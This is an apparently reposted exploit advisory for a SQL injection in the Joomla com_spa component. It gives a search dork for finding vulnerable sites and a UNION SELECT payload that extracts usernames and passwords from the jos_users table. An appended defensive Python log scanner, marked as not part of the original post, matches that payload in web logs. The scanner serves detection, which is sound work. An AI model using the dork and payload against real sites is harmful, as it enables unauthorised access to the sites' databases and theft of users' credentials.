[Recommended]Joomla Component com_spa SQL Injection Vulnerability
Posted: 2010-7-21 22:58 2651
====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================

Author   : altbta
Email    : [l_9[at]hotmail[dot]com]
Homepage : { }
DORK     : inurl:"index.php?option=com_spa"

===================================================

[+] Vulnerable File :

[+] ExploiT : -35 UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from jos_users--

[+] Example : SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from jos_users--

[+] Demo :
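A defender's view of the request shape this advisory describes, as an added example that is not part of the original post: a Python scan of web access logs for `com_spa` requests carrying a `UNION SELECT` against `jos_users`. The log lines are constructed, and the parameter name `id` is a placeholder because the advisory's own parameter is not legible on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines. Addresses are documentation-range values and the
# parameter name "id" is a placeholder (assumption), not taken from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Jul/2010:22:58:01 +0800] "GET /index.php?option=com_spa&id=35 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Jul/2010:22:59:10 +0800] "GET /index.php?option=com_spa&id=-35%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6%20from%20jos_users-- HTTP/1.1" 200 5300',
    '203.0.113.9 - - [21/Jul/2010:22:59:30 +0800] "GET /index.php?option=com_spa&id=-35+UnIoN/**/SeLeCt+1,2+from+jos_users HTTP/1.1" 200 5300',
    '203.0.113.7 - - [21/Jul/2010:23:00:00 +0800] "GET /index.php?option=com_content&id=-1+union+select+1 HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r'/\*.*?\*/', re.S)
SIGNS = {
    "union_select": re.compile(r'\bunion\b\s+(?:all\s+)?\bselect\b', re.I),
    "jos_users": re.compile(r'\bjos_users\b', re.I),
    "concat_creds": re.compile(r'concat\s*\(\s*username', re.I),
}

def normalize(value):
    """Undo double URL-encoding and replace inline SQL comments with a space."""
    for _ in range(2):
        value = unquote_plus(value)
    return SQL_COMMENT.sub(" ", value)

def scan_line(line):
    """Return (client, matched signs) for a suspicious com_spa request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qsl already decodes once; normalize() handles further encoding layers.
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if ("option", "com_spa") not in params:
        return None  # scoped to the component named in the advisory
    hits = set()
    for _, raw in params:
        value = normalize(raw)
        hits.update(tag for tag, rx in SIGNS.items() if rx.search(value))
    return (client, sorted(hits)) if hits else None

def scan(lines):
    """Scan an iterable of log lines and return only the flagged requests."""
    return [r for r in map(scan_line, lines) if r]
```

Matching is done on the decoded, comment-stripped value, so case changes, `+`/`%20` spacing and `/**/` padding do not hide the pattern.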